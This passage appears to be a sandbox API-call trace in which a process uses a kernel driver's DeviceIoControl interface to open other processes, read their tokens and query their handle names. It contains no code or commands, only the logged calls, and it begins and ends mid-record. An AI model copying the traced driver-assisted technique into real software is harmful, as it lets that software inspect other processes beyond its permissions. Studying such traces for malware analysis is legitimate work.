IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0149.604] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0149.604] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x70c) returned 0xc8 [0149.604] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0149.604] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8001feeb30, HandleInformation=0x0) returned 0x0 [0149.604] ObOpenObjectByPointer (in: Object=0xfffffa8001feeb30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff800007c4) returned 0x0 [0149.604] ObfDereferenceObject (Object=0xfffffa8001feeb30) returned 0x14 [0149.604] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007c4, DesiredAccess=0x8, TokenHandle=0xfffffa80021731c0 | out: TokenHandle=0xfffffa80021731c0*=0xc4) returned 0x0 [0149.604] ZwClose (Handle=0xffffffff800007c4) returned 0x0 [0149.604] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0149.604] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0149.604] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0149.606] CloseHandle (hObject=0xc4) returned 1 [0149.606] CloseHandle (hObject=0xc8) returned 1 [0149.606] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0149.606] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0149.606] PsLookupProcessByProcessId (in: ProcessId=0x70c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0149.606] PsAcquireProcessExitSynchronization () returned 0x0 [0149.606] KeStackAttachProcess (in: PROCESS=0xfffffa8001feeb30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001feeb30, ApcState=0xfffff880051635d0) [0149.606] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003a90530, HandleInformation=0x0) returned 0x0 [0149.606] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0149.606] PsReleaseProcessExitSynchronization () returned 0x2 [0149.606] ObfDereferenceObject (Object=0xfffffa8001feeb30) returned 0x12 [0149.606] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f93044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f93044, ReturnLength=0xfffff88005163508) returned 0x0 [0149.606] ObfDereferenceObject (Object=0xfffffa8003a90530) returned 0x1 [0149.606] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0149.607] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0149.607] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0149.607] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x7c, lpOverlapped=0x0) returned 1 [0149.607] PsLookupProcessByProcessId (in: ProcessId=0x70c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0149.607] PsAcquireProcessExitSynchronization () returned 0x0 [0149.607] KeStackAttachProcess (in: PROCESS=0xfffffa8001feeb30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001feeb30, ApcState=0xfffff880051635d0) [0149.607] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001fdbf20, HandleInformation=0x0) returned 0x0 [0149.607] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0149.607] PsReleaseProcessExitSynchronization () returned 0x2 [0149.607] ObfDereferenceObject (Object=0xfffffa8001feeb30) returned 0x12 [0149.607] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002ff2044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002ff2044, ReturnLength=0xfffff88005163508) returned 0x0 [0149.607] ObfDereferenceObject (Object=0xfffffa8001fdbf20) returned 0x1 [0149.607] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0149.607] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0149.607] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0149.607] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0149.607] PsLookupProcessByProcessId (in: ProcessId=0x70c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0149.608] PsAcquireProcessExitSynchronization () returned 0x0 [0149.608] KeStackAttachProcess (in: PROCESS=0xfffffa8001feeb30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001feeb30, ApcState=0xfffff880051635d0) [0149.608] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0149.608] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0149.608] PsReleaseProcessExitSynchronization () returned 0x2 [0149.608] ObfDereferenceObject (Object=0xfffffa8001feeb30) returned 0x12 [0149.608] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8002ff3044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002ff3044, ReturnLength=0xfffff88005163550) returned 0x0 [0149.608] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x52 [0149.608] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0149.608] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0149.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x434) returned 0xc8 [0149.608] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0149.608] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8002005b30, HandleInformation=0x0) returned 0x0 [0149.608] ObOpenObjectByPointer (in: Object=0xfffffa8002005b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff800007c4) returned 0x0 [0149.608] ObfDereferenceObject (Object=0xfffffa8002005b30) returned 0x14 [0149.608] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007c4, DesiredAccess=0x8, TokenHandle=0xfffffa80021731c0 | out: TokenHandle=0xfffffa80021731c0*=0xc4) returned 0x0 [0149.608] ZwClose (Handle=0xffffffff800007c4) returned 0x0 [0149.608] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0149.609] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0149.609] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0149.610] CloseHandle (hObject=0xc4) returned 1 [0149.610] CloseHandle (hObject=0xc8) returned 1 [0149.611] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0149.611] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0149.611] PsLookupProcessByProcessId (in: ProcessId=0x434, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0149.611] PsAcquireProcessExitSynchronization () returned 0x0 [0149.611] KeStackAttachProcess (in: PROCESS=0xfffffa8002005b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002005b30, ApcState=0xfffff880051635d0) [0149.611] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001e8df20, HandleInformation=0x0) returned 0x0 [0149.611] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0149.611] PsReleaseProcessExitSynchronization () returned 0x2 [0149.611] ObfDereferenceObject (Object=0xfffffa8002005b30) returned 0x12 [0149.611] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002ffe044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002ffe044, ReturnLength=0xfffff88005163508) returned 0x0 [0149.611] ObfDereferenceObject (Object=0xfffffa8001e8df20) returned 0x1 [0149.611] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0149.611] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0149.611] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0149.611] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x64, lpOverlapped=0x0) returned 1 [0149.611] PsLookupProcessByProcessId (in: ProcessId=0x434, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0149.612] PsAcquireProcessExitSynchronization () returned 0x0 [0149.612] KeStackAttachProcess (in: PROCESS=0xfffffa8002005b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002005b30, ApcState=0xfffff880051635d0) [0149.612] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001ef3cd0, HandleInformation=0x0) returned 0x0 [0149.612] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0149.612] PsReleaseProcessExitSynchronization () returned 0x2 [0149.612] ObfDereferenceObject (Object=0xfffffa8002005b30) returned 0x12 [0149.612] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fff044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fff044, ReturnLength=0xfffff88005163508) returned 0x0 [0149.612] ObfDereferenceObject (Object=0xfffffa8001ef3cd0) returned 0x1 [0149.612] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0149.612] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0149.612] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0149.612] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0149.612] PsLookupProcessByProcessId (in: ProcessId=0x434, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0149.612] PsAcquireProcessExitSynchronization () returned 0x0 [0149.612] KeStackAttachProcess (in: PROCESS=0xfffffa8002005b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002005b30, ApcState=0xfffff880051635d0) [0149.612] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0149.612] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0149.613] PsReleaseProcessExitSynchronization () returned 0x2 [0149.613] ObfDereferenceObject (Object=0xfffffa8002005b30) returned 0x12 [0149.613] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003007044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8003007044, ReturnLength=0xfffff88005163550) returned 0x0 [0149.613] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x52 [0149.613] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0149.613] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0149.613] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a8) returned 0xc8 [0149.613] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0149.613] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8002017b30, HandleInformation=0x0) returned 0x0 [0149.613] ObOpenObjectByPointer (in: Object=0xfffffa8002017b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff800007c4) returned 0x0 [0149.613] ObfDereferenceObject (Object=0xfffffa8002017b30) returned 0x14 [0149.613] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007c4, DesiredAccess=0x8, TokenHandle=0xfffffa80021731c0 | out: TokenHandle=0xfffffa80021731c0*=0xc4) returned 0x0 [0149.613] ZwClose (Handle=0xffffffff800007c4) returned 0x0 [0149.613] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0149.613] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0149.613] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0149.615] CloseHandle (hObject=0xc4) returned 1 [0149.615] CloseHandle (hObject=0xc8) returned 1 [0149.616] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0149.616] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0149.616] PsLookupProcessByProcessId (in: ProcessId=0x7a8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0149.616] PsAcquireProcessExitSynchronization () returned 0x0 [0149.616] KeStackAttachProcess (in: PROCESS=0xfffffa8002017b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002017b30, ApcState=0xfffff880051635d0) [0149.616] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002019f20, HandleInformation=0x0) returned 0x0 [0149.616] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0149.616] PsReleaseProcessExitSynchronization () returned 0x2 [0149.616] ObfDereferenceObject (Object=0xfffffa8002017b30) returned 0x12 [0149.616] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003008044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8003008044, ReturnLength=0xfffff88005163508) returned 0x0 [0149.616] ObfDereferenceObject (Object=0xfffffa8002019f20) returned 0x1 [0149.616] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0149.617] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0149.617] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0149.617] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8a, lpOverlapped=0x0) returned 1 [0149.617] PsLookupProcessByProcessId (in: ProcessId=0x7a8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0149.617] PsAcquireProcessExitSynchronization () returned 0x0 [0149.617] KeStackAttachProcess (in: PROCESS=0xfffffa8002017b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002017b30, ApcState=0xfffff880051635d0) [0149.617] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002019a60, HandleInformation=0x0) returned 0x0 [0149.617] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0149.617] PsReleaseProcessExitSynchronization () returned 0x2 [0149.617] ObfDereferenceObject (Object=0xfffffa8002017b30) returned 0x12 [0149.617] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800300b044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa800300b044, ReturnLength=0xfffff88005163508) returned 0x0 [0149.618] ObfDereferenceObject (Object=0xfffffa8002019a60) returned 0x1 [0149.618] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0149.618] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0149.618] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0149.618] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0149.618] PsLookupProcessByProcessId (in: ProcessId=0x7a8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0149.618] PsAcquireProcessExitSynchronization () returned 0x0 [0149.618] KeStackAttachProcess (in: PROCESS=0xfffffa8002017b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002017b30, ApcState=0xfffff880051635d0) [0149.618] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0149.618] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0149.618] PsReleaseProcessExitSynchronization () returned 0x2 [0149.618] ObfDereferenceObject (Object=0xfffffa8002017b30) returned 0x12 [0149.618] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa800309f044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800309f044, ReturnLength=0xfffff88005163550) returned 0x0 [0149.618] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x52 [0149.619] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0149.619] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0149.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x564) returned 0xc8 [0149.619] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0149.619] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8002026b30, HandleInformation=0x0) returned 0x0 [0149.619] ObOpenObjectByPointer (in: Object=0xfffffa8002026b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff800007c4) returned 0x0 [0149.619] ObfDereferenceObject (Object=0xfffffa8002026b30) returned 0x14 [0149.619] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007c4, DesiredAccess=0x8, TokenHandle=0xfffffa80021731c0 | out: TokenHandle=0xfffffa80021731c0*=0xc4) returned 0x0 [0149.619] ZwClose (Handle=0xffffffff800007c4) returned 0x0 [0149.619] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0149.619] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0149.619] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0149.622] CloseHandle (hObject=0xc4) returned 1 [0149.622] CloseHandle (hObject=0xc8) returned 1 [0149.622] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0149.622] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0149.622] PsLookupProcessByProcessId (in: ProcessId=0x564, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0149.622] PsAcquireProcessExitSynchronization () returned 0x0 [0149.622] KeStackAttachProcess (in: PROCESS=0xfffffa8002026b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002026b30, ApcState=0xfffff880051635d0) [0149.622] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001e7ef20, HandleInformation=0x0) returned 0x0 [0149.622] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0149.623] PsReleaseProcessExitSynchronization () returned 0x2 [0149.623] ObfDereferenceObject (Object=0xfffffa8002026b30) returned 0x12 [0149.623] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030a0044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030a0044, ReturnLength=0xfffff88005163508) returned 0x0 [0149.623] ObfDereferenceObject (Object=0xfffffa8001e7ef20) returned 0x1 [0149.623] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0149.623] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0149.623] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0149.623] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, 